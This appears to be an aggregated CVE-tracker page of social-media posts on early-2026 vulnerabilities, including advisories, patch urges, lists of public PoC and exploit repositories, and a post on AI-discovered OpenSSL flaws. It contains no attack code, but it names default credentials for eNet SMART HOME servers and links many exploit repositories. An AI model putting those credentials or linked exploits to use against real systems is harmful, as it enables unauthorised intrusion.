##updated 2026-02-17T18:33:00
2 posts
1 repos
🔴 CVE-2025-70830 - Critical (9.9)
A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-70830 - Critical (9.9)
A Server-Side Template Injection (SSTI) vulnerability in the Freemarker template engine of Datart v1.0.0-rc.3 allows authenticated attackers to execute arbitrary code via injecting crafted Freemarker template syntax into the SQL script field.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:42
4 posts
The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/
##🟠 CVE-2025-65716 - High (8.8)
An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##The security issues impact Code Runner (CVE-2025-65715), Markdown Preview Enhanced (CVE-2025-65716), Markdown Preview Enhanced (CVE-2025-65717), and Microsoft Live Preview (no identifier assigned). https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/
##🟠 CVE-2025-65716 - High (8.8)
An issue in Visual Studio Code Extensions Markdown Preview Enhanced v0.8.18 allows attackers to execute arbitrary code via uploading a crafted .Md file.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65716/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:42
6 posts
⚠️ CVE-2026-2439 (CRITICAL) in BVA Concierge::Sessions 0.8.1 – 0.8.4: Predictable session IDs due to weak randomness let attackers hijack sessions. Upgrade ASAP or use secure RNG for session IDs. https://radar.offseq.com/threat/cve-2026-2439-cwe-340-generation-of-predictable-nu-8847b5d6 #OffSeq #CVE20262439 #infosec #vuln
##🔴 CVE-2026-2439 - Critical (9.8)
Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2439/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2439 - Critical (9.8)
Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2439/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##⚠️ CVE-2026-2439 (CRITICAL) in BVA Concierge::Sessions 0.8.1 – 0.8.4: Predictable session IDs due to weak randomness let attackers hijack sessions. Upgrade ASAP or use secure RNG for session IDs. https://radar.offseq.com/threat/cve-2026-2439-cwe-340-generation-of-predictable-nu-8847b5d6 #OffSeq #CVE20262439 #infosec #vuln
##🔴 CVE-2026-2439 - Critical (9.8)
Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2439/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-2439 - Critical (9.8)
Concierge::Sessions versions from 0.8.1 before 0.8.5 for Perl generate insecure session ids. The generate_session_id function in Concierge::Sessions::Base defaults to using the uuidgen command to generate a UUID, with a fallback to using Perl's bu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2439/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:42
2 posts
🔴 CVE-2025-69633 - Critical (9.8)
A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69633/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-69633 - Critical (9.8)
A SQL Injection vulnerability in the Advanced Popup Creator (advancedpopupcreator) module for PrestaShop 1.1.26 through 1.2.6 (Fixed in version 1.2.7) allows remote unauthenticated attackers to execute arbitrary SQL queries via the fromController ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69633/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:42
4 posts
🟠 CVE-2026-2474 - High (7.5)
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2474/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2474 - High (7.5)
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2474/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2474 - High (7.5)
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2474/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2474 - High (7.5)
Crypt::URandom versions from 0.41 before 0.55 for Perl is vulnerable to a heap buffer overflow in the XS function crypt_urandom_getrandom().
The function does not validate that the length parameter is non-negative. If a negative value (e.g. -1) i...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2474/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:32:41
6 posts
RE: https://infosec.exchange/@beyondmachines1/116091996381907798
Mozilla publie des mises à jour de sécurité pour Firefox et Thunderbird
Mozilla a publié des mises à jour de sécurité pour Firefox et Thunderbird afin de corriger un débordement de mémoire tampon de grande gravité (CVE-2026-2447) dans la bibliothèque libvpx qui permet l'exécution de code à distance par le biais d'un contenu vidéo malformé.
#cybersécurité #infosec #conseil #vulnérabilité
#cybersecurity #infosec #advisory #vulnerability
___
Mozilla Releases Security Updates for Firefox and Thunderbird
Mozilla released security updates for Firefox and Thunderbird to patch a high-severity heap buffer overflow (CVE-2026-2447) in the libvpx library that allows remote code execution via malformed video content.
**If you're using Mozilla Firefox or Thunderbird enable automatic updates for your browsers and mail clients and force an update. Even if the flaw is not critical, it's still better to update the browser and email client - they are your windows into the internet. Since this vulnerability can be triggered just by visiting a website or playing a video, patching is your best defense.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/mozilla-releases-urgent-security-updates-for-firefox-and-thunderbird-to-patch-critical-libvpx-flaw-d-w-y-g-x/gD2P6Ple2L
🟠 CVE-2026-2447 - High (8.8)
Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Firefox ESR < 140.7.1, Firefox ESR < 115.32.1, Thunderbird < 140.7.2, and Thunderbird < 147.0.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2447/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Mozilla Releases Security Updates for Firefox and Thunderbird
Mozilla released security updates for Firefox and Thunderbird to patch a high-severity heap buffer overflow (CVE-2026-2447) in the libvpx library that allows remote code execution via malformed video content.
**If you're using Mozilla Firefox or Thunderbird enable automatic updates for your browsers and mail clients and force an update. Even if the flaw is not critical, it's still better to update the browser and email client - they are your windows into the internet. Since this vulnerability can be triggered just by visiting a website or playing a video, patching is your best defense.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/mozilla-releases-urgent-security-updates-for-firefox-and-thunderbird-to-patch-critical-libvpx-flaw-d-w-y-g-x/gD2P6Ple2L
🟠 CVE-2026-2447 - High (8.8)
Heap buffer overflow in libvpx. This vulnerability affects Firefox < 147.0.4, Firefox ESR < 140.7.1, Firefox ESR < 115.32.1, Thunderbird < 140.7.2, and Thunderbird < 147.0.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2447/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T15:31:36
2 posts
🟠 CVE-2026-2616 - High (8.8)
A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the lo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2616/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2616 - High (8.8)
A vulnerability has been found in Beetel 777VR1 up to 01.00.09. The impacted element is an unknown function of the component Web Management Interface. The manipulation leads to hard-coded credentials. The attack needs to be initiated within the lo...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2616/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T13:40:10.320000
1 posts
4 repos
https://github.com/win3zz/CVE-2026-1731
https://github.com/bytehazard/CVE-2026-1731
Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.
##updated 2026-02-17T12:31:18
2 posts
CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! https://radar.offseq.com/threat/cve-2026-2247-cwe-89-improper-neutralization-of-sp-b8f5f03e #OffSeq #SQLi #InfoSec #EduSec
##CVE-2026-2247: HIGH-severity SQL injection in Clickedu SaaS (all versions). Attackers can exploit 'id_alu' in report card URLs to access sensitive data. Persistent session tokens increase risk. Prioritize mitigation! https://radar.offseq.com/threat/cve-2026-2247-cwe-89-improper-neutralization-of-sp-b8f5f03e #OffSeq #SQLi #InfoSec #EduSec
##updated 2026-02-17T12:31:13
1 posts
🟠 CVE-2025-7631 - High (8.6)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tumeva Internet Technologies Software Information Advertising and Consulting Services Trade Ltd. Co. Tumeva News Software allows SQL Injection.Th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-7631/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T06:31:26
2 posts
1 repos
🛡️ CVE-2026-2592 (HIGH, CVSS 7.7): Zarinpal Gateway for WooCommerce has improper access control — orders can be marked as paid via reused authority tokens. All versions affected. Audit callback validation & monitor for fraud. Details: https://radar.offseq.com/threat/cve-2026-2592-cwe-284-improper-access-control-in-z-22959dc1 #OffSeq #WooCommerce #WordPress
##🟠 CVE-2026-2592 - High (7.7)
The Zarinpal Gateway for WooCommerce plugin for WordPress is vulnerable to Improper Access Control to Payment Status Update in all versions up to and including 5.0.16. This is due to the payment callback handler 'Return_from_ZarinPal_Gateway' fail...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2592/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T03:30:16
1 posts
⚠️ CRITICAL: CVE-2026-26220 in ModelTC LightLLM ≤1.1.0 allows unauth RCE via unsafe pickle deserialization on WebSocket endpoints. Restrict PD master node access & monitor for attacks. No patch yet — act now! https://radar.offseq.com/threat/cve-2026-26220-cwe-502-deserialization-of-untruste-3d57a118 #OffSeq #infosec #CVE202626220 #rce
##updated 2026-02-17T00:30:19
1 posts
🟠 CVE-2025-12062 - High (8.8)
The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.8.6 via the fc_load_template function. This makes it poss...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-12062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-16T18:31:31
1 posts
1 repos
🛑 CRITICAL vuln (CVE-2026-2564) in Intelbras VIP 3260 Z IA (2.840.00IB005.0.T): Weak password recovery via /OutsideCmd enables remote attack. No user interaction needed. Restrict access, monitor, and await patch. https://radar.offseq.com/threat/cve-2026-2564-weak-password-recovery-in-intelbras--15b4ad92 #OffSeq #CVE20262564 #IoTSecurity
##updated 2026-02-16T15:32:54
1 posts
CVE-2026-1333 (HIGH, CVSS 7.8): SOLIDWORKS eDrawings 2025 – 2026 SP0 vulnerable to code execution via crafted EPRT files. No exploits yet, but patch and restrict file handling! https://radar.offseq.com/threat/cve-2026-1333-cwe-457-use-of-uninitialized-variabl-1f2a1adb #OffSeq #vuln #SOLIDWORKS #infosec
##updated 2026-02-16T12:32:02
1 posts
⚠️ CVE-2026-2451 (HIGH): pretix-doistep 1.0.0 allows backend users to abuse email template placeholders to exfiltrate config, DB passwords & API keys. Rotate creds, audit templates & restrict edit rights ASAP. https://radar.offseq.com/threat/cve-2026-2451-cwe-627-dynamic-variable-evaluation--3e2879f1 #OffSeq #Vulnerability #pretix #InfoSec
##updated 2026-02-16T12:32:01
1 posts
🔒 CVE-2026-2452 (HIGH): pretix-newsletter 1.0.0 & 2.0.0 let backend users leak sensitive data by abusing placeholders in email templates. Rotate credentials, restrict edit rights, and monitor changes! More: https://radar.offseq.com/threat/cve-2026-2452-cwe-627-dynamic-variable-evaluation--1e0b8836 #OffSeq #Vuln #pretix #Infosec
##updated 2026-02-16T12:32:00
1 posts
🔴 New security advisory:
CVE-2026-2577 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://advisory.yazoul.net/cve/cve-2026-2577
updated 2026-02-15T18:30:25
3 posts
🔴 CVE-2026-26369 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26369/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26369 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26369/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26369 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 contains a privilege escalation vulnerability due to insufficient authorization checks in the setUserGroup JSON-RPC method. A low-privileged user (UG_USER) can send a crafted POST request to /jsonrpc/manageme...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26369/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T18:30:24
2 posts
🔴 CVE-2026-26366 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26366/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-26366 - Critical (9.8)
eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-26366/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T12:30:34
3 posts
🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-32062 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32062/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T12:30:34
2 posts
🔴 CVE-2025-32058 - Critical (9.3)
The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32058/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-32058 - Critical (9.3)
The Infotainment ECU manufactured by Bosch uses a RH850 module for CAN communication. RH850 is connected to infotainment over the INC interface through a custom protocol. There is a vulnerability during processing requests of this protocol on the ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32058/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T12:30:25
1 posts
🟠 CVE-2025-32059 - High (8.8)
The specific flaw exists within the Bluetooth stack developed by Alps Alpine of the Infotainment ECU manufactured by Bosch. The issue results from the lack of proper boundary validation of user-supplied data, which can result in a stack-based buff...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-32059/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-15T06:31:38
3 posts
1 repos
Critical Vulnerability in CleanTalk WordPress Plugin Puts 200,000 Sites at Risk
A recently discovered critical vulnerability (CVE-2026-1490, CVSS 9.8) in the CleanTalk WordPress plugin, affecting versions up to 6.71, has raised alarms for the cybersecurity community. This flaw exposes over 200,000 websites to severe threats, allowing unauthenticated attackers to exploit the vulnerability. The attackers could potentially install malicious plugins and execute remote code…
##Critical CleanTalk Plugin Vulnerability Allows WordPress Site Takeover via DNS Spoofing
A critical vulnerability in the CleanTalk WordPress plugin (CVE-2026-1490) allows unauthenticated attackers to bypass authorization via Reverse DNS spoofing and install arbitrary plugins, leading to full site takeover.
**If you are using ""Spam protection, Anti-Spam, FireWall by CleanTalk", update ASAP. Never rely on DNS records for authentication because they are easily spoofed by attackers.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-cleantalk-plugin-vulnerability-allows-wordpress-site-takeover-via-dns-spoofing-v-h-r-b-n/gD2P6Ple2L
🔴 CVE-2026-1490 - Critical (9.8)
The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS (PTR record) spoofing on the 'checkWithoutToken' function in all ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-13T14:04:05.243000
1 posts
3 repos
Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen
Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm
#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump
##updated 2026-02-11T18:31:37
2 posts
Why isn't anyone talking about this PostgreSQL vulnerability? https://nvd.nist.gov/vuln/detail/cve-2026-2360
Did y'all talk about it last week without me?
##Why isn't anyone talking about this PostgreSQL vulnerability? https://nvd.nist.gov/vuln/detail/cve-2026-2360
Did y'all talk about it last week without me?
##updated 2026-02-11T15:40:42.937000
1 posts
61 repos
https://github.com/leonjza/inetutils-telnetd-auth-bypass
https://github.com/0x7556/CVE-2026-24061
https://github.com/madfxr/Twenty-Three-Scanner
https://github.com/parameciumzhang/Tell-Me-Root
https://github.com/yanxinwu946/CVE-2026-24061--telnetd
https://github.com/0p5cur/CVE-2026-24061-POC
https://github.com/SeptembersEND/CVE--2026-24061
https://github.com/novitahk/Exploit-CVE-2026-24061
https://github.com/infat0x/CVE-2026-24061
https://github.com/lavabyte/telnet-CVE-2026-24061
https://github.com/punitdarji/telnetd-cve-2026-24061
https://github.com/ibrahmsql/CVE-2026-24061-PoC
https://github.com/duy-31/CVE-2026-24061---telnetd
https://github.com/z3n70/CVE-2026-24061
https://github.com/SafeBreach-Labs/CVE-2026-24061
https://github.com/BrainBob/CVE-2026-24061
https://github.com/midox008/CVE-2026-24061
https://github.com/X-croot/CVE-2026-24061_POC
https://github.com/Gabs-hub/CVE-2026-24061_Lab
https://github.com/TryA9ain/CVE-2026-24061
https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061
https://github.com/shivam-bathla/CVE-2026-24061-setup
https://github.com/hilwa24/CVE-2026-24061
https://github.com/Parad0x7e/CVE-2026-24061
https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester
https://github.com/scumfrog/cve-2026-24061
https://github.com/SystemVll/CVE-2026-24061
https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
https://github.com/Alter-N0X/CVE-2026-24061-POC
https://github.com/Chocapikk/CVE-2026-24061
https://github.com/xuemian168/CVE-2026-24061
https://github.com/ridpath/Terrminus-CVE-2026-2406
https://github.com/Ali-brarou/telnest
https://github.com/LucasPDiniz/CVE-2026-24061
https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
https://github.com/Mr-Zapi/CVE-2026-24061
https://github.com/franckferman/CVE_2026_24061_PoC
https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root
https://github.com/hyu164/Terrminus-CVE-2026-2406
https://github.com/ilostmypassword/Melissae
https://github.com/killsystema/scan-cve-2026-24061
https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061
https://github.com/r00tuser111/CVE-2026-24061
https://github.com/buzz075/CVE-2026-24061
https://github.com/h3athen/CVE-2026-24061
https://github.com/XsanFlip/CVE-2026-24061-Scanner
https://github.com/typeconfused/CVE-2026-24061
https://github.com/Lingzesec/CVE-2026-24061-GUI
https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd
https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
https://github.com/m3ngx1ng/cve_2026_24061_cli
https://github.com/cumakurt/tscan
https://github.com/tiborscholtz/CVE-2026-24061
https://github.com/hackingyseguridad/root
https://github.com/ms0x08-dev/CVE-2026-24061-POC
https://github.com/obrunolima1910/CVE-2026-24061
https://github.com/balgan/CVE-2026-24061
https://github.com/Mefhika120/Ashwesker-CVE-2026-24061
updated 2026-02-10T21:31:29
1 posts
1 repos
updated 2026-02-10T21:31:29
1 posts
updated 2026-02-09T16:08:35.290000
1 posts
updated 2026-02-09T09:30:28
1 posts
🚨 New security advisory:
CVE-2026-22903 affects multiple systems.
• Impact: Remote code execution or complete system compromise possible
• Risk: Attackers can gain full control of affected systems
• Mitigation: Patch immediately or isolate affected systems
Full breakdown:
https://advisory.yazoul.net/cve/cve-2026-22903
updated 2026-02-06T16:45:15.323000
1 posts
1 repos
Alarming Surge in SmarterMail Exploits Threatens Email Servers Worldwide
Cybersecurity experts are raising the alarm as critical vulnerabilities in SmarterMail—specifically CVE-2026-24423 and CVE-2026-23760—are being rapidly weaponized. Exploit proof-of-concepts (PoCs), stolen administrator credentials, and even ransomware deployment instructions are circulating openly on Telegram channels. Organizations relying on these email servers face an urgent need to patch their…
https://undercodenews.com/alarming-surge-in-smartermail-exploits-threatens-email-servers-worldwide/
##updated 2026-02-04T16:34:21.763000
4 posts
1 repos
https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE
This was posted yesterday.
Unit 42: Critical Vulnerabilities in Ivanti EPMM Exploited https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/ @unit42_intel #infosec #Ivanti #vulnerability
##Critical Vulnerabilities in Ivanti EPMM Exploited
https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/
##This was posted yesterday.
Unit 42: Critical Vulnerabilities in Ivanti EPMM Exploited https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/ @unit42_intel #infosec #Ivanti #vulnerability
##Critical Vulnerabilities in Ivanti EPMM Exploited
https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/
##updated 2026-02-04T15:56:15.730000
2 posts
Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.
##Gitlab vulnerability CVE-2021-22175 got added to the CISA KEV. But this vuln is just a more complete patch to CVE-2021-22214. Likewise CVE-2021-39935 covers even more case where the CI Lint function could be used without authentication. In fact, the exploit code identical for all vulnerabilites. CVE-2021-39935 was already on the list, CVE-2021-22175 got added today and CVE-2021-22214 is still missing.
##updated 2026-02-02T18:38:55.073000
2 posts
4 repos
https://github.com/guiimoraes/CVE-2025-15467
https://github.com/balgan/CVE-2025-15467
this looks like a genuinely good and very impressive use of “AI” in security research – I’m leaving the air quotes in place at the moment since I haven’t been able to find much detail on how the system actually operates. #AISLE describes it as an “autonomous analyser” and “the world’s first #AI-native Cyber Reasoning System (CRS) for vulnerability management” 🙄
I’m pretty sure it’s not just spicy autocarrot though, possibly a mix of deep learning or other machine learning techniques (things that I think of as part of “traditional” AI research) with a sprinkling of LLM on top for “natural language” capabilities (and it’s possible that they’re leaning into “AI” as a descriptor to assign to the current hype cycle rather than calling it “machine learning” but ¯_(ツ)_/¯ )
What AI Security Research Looks Like When It Works
“In the latest #OpenSSL security release on January 27, 2026, twelve new zero-day vulnerabilities (meaning unknown to the maintainers at time of disclosure) were announced. Our AI system is responsible for the original discovery of all twelve, each found and responsibly disclosed to the OpenSSL team during the fall and winter of 2025. Of those, 10 were assigned #CVE-2025 identifiers and 2 received CVE-2026 identifiers. Adding the 10 to the three we already found in the Fall 2025 release, AISLE is credited for surfacing 13 of 14 OpenSSL #CVEs assigned in 2025, and 15 total across both releases. This is a historically unusual concentration for any single research team, let alone an AI-driven one.
These weren't trivial findings either. They included CVE-2025-15467, a stack buffer overflow in CMS message parsing that's potentially remotely exploitable without valid key material, and exploits for which have been quickly developed online. OpenSSL rated it HIGH severity; NIST's CVSS v3 score is 9.8 out of 10 (CRITICAL, an extremely rare severity rating for such projects). Three of the bugs had been present since 1998-2000, for over a quarter century having been missed by intense machine and human effort alike. One predated OpenSSL itself, inherited from #EricYoung's original #SSLeay implementation in the 1990s. All of this in a codebase that has been fuzzed for millions of CPU-hours and audited extensively for over two decades by teams including Google's.
In five of the twelve cases, our AI system directly proposed the patches that were accepted into the official release.”
https://aisle.com/blog/what-ai-security-research-looks-like-when-it-works
##this looks like a genuinely good and very impressive use of “AI” in security research – I’m leaving the air quotes in place at the moment since I haven’t been able to find much detail on how the system actually operates. #AISLE describes it as an “autonomous analyser” and “the world’s first #AI-native Cyber Reasoning System (CRS) for vulnerability management” 🙄
I’m pretty sure it’s not just spicy autocarrot though, possibly a mix of deep learning or other machine learning techniques (things that I think of as part of “traditional” AI research) with a sprinkling of LLM on top for “natural language” capabilities (and it’s possible that they’re leaning into “AI” as a descriptor to assign to the current hype cycle rather than calling it “machine learning” but ¯_(ツ)_/¯ )
What AI Security Research Looks Like When It Works
